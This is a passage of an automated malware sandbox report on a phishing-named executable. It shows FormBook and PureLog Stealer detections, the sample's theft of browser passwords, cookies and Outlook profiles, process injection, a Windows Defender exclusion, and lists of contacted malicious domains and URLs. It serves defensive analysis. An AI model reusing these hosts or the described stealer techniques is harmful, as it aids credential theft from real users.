                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeQueries volume information: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 13.2.fcLfLlfpmjf.exe.28a731c.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1302494818.0000000005A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1361939859.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1295194192.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\sdiagnhost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 13.2.fcLfLlfpmjf.exe.28a731c.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1302494818.0000000005A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1361939859.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1295194192.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Timestomp                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1411001 Sample: BANK DETAILS CORRECTIONS.exe Startdate: 18/03/2024 Architecture: WINDOWS Score: 100 64 www.nikazo.xyz 2->64 66 xiaoyue.zhuangkou.com 2->66 68 19 other IPs or domains 2->68 72 Snort IDS alert for network traffic 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 Antivirus detection for URL or domain 2->76 80 11 other signatures 2->80 10 BANK DETAILS CORRECTIONS.exe 7 2->10         started        14 fcLfLlfpmjf.exe 5 2->14         started        signatures3 78 Performs DNS queries to domains with low reputation 64->78 process4 file5 54 C:\Users\user\AppData\...\fcLfLlfpmjf.exe, PE32 10->54 dropped 56 C:\Users\user\AppData\Local\...\tmpB1A6.tmp, XML 10->56 dropped 84 Adds a directory exclusion to Windows Defender 10->84 86 Injects a PE file into a foreign processes 10->86 16 BANK DETAILS CORRECTIONS.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        88 Multi AV Scanner detection for dropped file 14->88 90 Machine Learning detection for dropped file 14->90 25 fcLfLlfpmjf.exe 14->25         started        27 schtasks.exe 1 14->27         started        signatures6 process7 signatures8 70 Maps a DLL or memory area into another process 16->70 29 EnKifmZDGZ.exe 16->29 injected 31 WmiPrvSE.exe 19->31         started        33 conhost.exe 19->33         started        35 conhost.exe 21->35         started        37 conhost.exe 23->37         started        39 EnKifmZDGZ.exe 25->39 injected 42 conhost.exe 27->42         started        process9 signatures10 44 sdiagnhost.exe 13 29->44         started        82 Maps a DLL or memory area into another process 39->82 47 sdiagnhost.exe 39->47         started        process11 signatures12 92 Tries to steal Mail credentials (via file / registry access) 44->92 94 Tries to harvest and steal browser information (history, passwords, etc) 44->94 96 Writes to foreign memory regions 44->96 98 3 other signatures 44->98 49 EnKifmZDGZ.exe 44->49 injected 52 firefox.exe 44->52         started        process13 dnsIp14 58 www.mgn.icu 49.0.230.183, 49733, 49734, 49735 YOKOUNANET-MN-AS-APYOKOZUNANETLLCMN Mongolia 49->58 60 xiaoyue.zhuangkou.com 47.76.88.64, 49716, 49717, 49718 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States 49->60 62 12 other IPs or domains 49->62

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                BANK DETAILS CORRECTIONS.exe71%ReversingLabsByteCode-MSIL.Trojan.SnakeKeylogger
                BANK DETAILS CORRECTIONS.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe71%ReversingLabsByteCode-MSIL.Trojan.SnakeKeylogger

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://mozilla.org0/0%URL Reputationsafe
                https://zbgzs.5pych.top/zic/qxk3gc.doc0%Avira URL Cloudsafe
                http://www.oc7o0.top0%Avira URL Cloudsafe
                http://www.oc7o0.top/wbb8f/mzs.pptx0%Avira URL Cloudsafe
                http://www.hondamechanic.today/e6xn/0%Avira URL Cloudsafe
                http://joahk.soaw8.top/0jyift/0%Avira URL Cloudsafe
                http://bgj.sf3l2.top/1j7rknm/0%Avira URL Cloudsafe
                http://www.hondamechanic.today/e6xn/?bvOt=u61FFSswTsQwZHK5Df1sdB0Y128x+tID5YHOMFlYU8e6X6f1CT0d10xaq3wUYzHCl9vsukjaIczYmr5kws9YFzoUz2fAyAt1utXToSD7Y3kRqMygPw==&CVZ=R6q4lTVpfZfT_D0%Avira URL Cloudsafe
                http://hzw.avt.temporary.site/wp-content/plugins/custom-twitter-feeds/css/ctf-styles.min.css?ver=2.20%Avira URL Cloudsafe
                http://jqyn6d.0dgqo.top/w876/7u54.doc0%Avira URL Cloudsafe
                http://dz30.d5s8h.top/zlf64/0%Avira URL Cloudsafe
                https://hxb.1cva0.top/hnz76/0%Avira URL Cloudsafe
                https://nyzn27r.8k4z2.top/fkh8x/0%Avira URL Cloudsafe
                https://85bj22.jsj91.top/2xat4/m98nsm.xls0%Avira URL Cloudsafe
                http://hzw.avt.temporary.site/wp-includes/css/dist/block-library/style.min.css?ver=6.4.30%Avira URL Cloudsafe
                http://lcj05un.1osh5.top/sucui0/7besnu.html0%Avira URL Cloudsafe
                http://www.oc7o0.top/302/riold.ppt0%Avira URL Cloudsafe
                http://www.oc7o0.top/7qe/8l9zr.pptx0%Avira URL Cloudsafe
                https://v94nhnh.kwx2l.top/e94/ropif.docx0%Avira URL Cloudsafe
                http://www.oc7o0.top/2jtdy62/0%Avira URL Cloudsafe
                https://6c4.l0yg7.top/nv6hczm/0%Avira URL Cloudsafe
                http://www.oc7o0.top/e6xn/0%Avira URL Cloudsafe
                http://www.oc7o0.top/1dys/2jgjq.docx0%Avira URL Cloudsafe
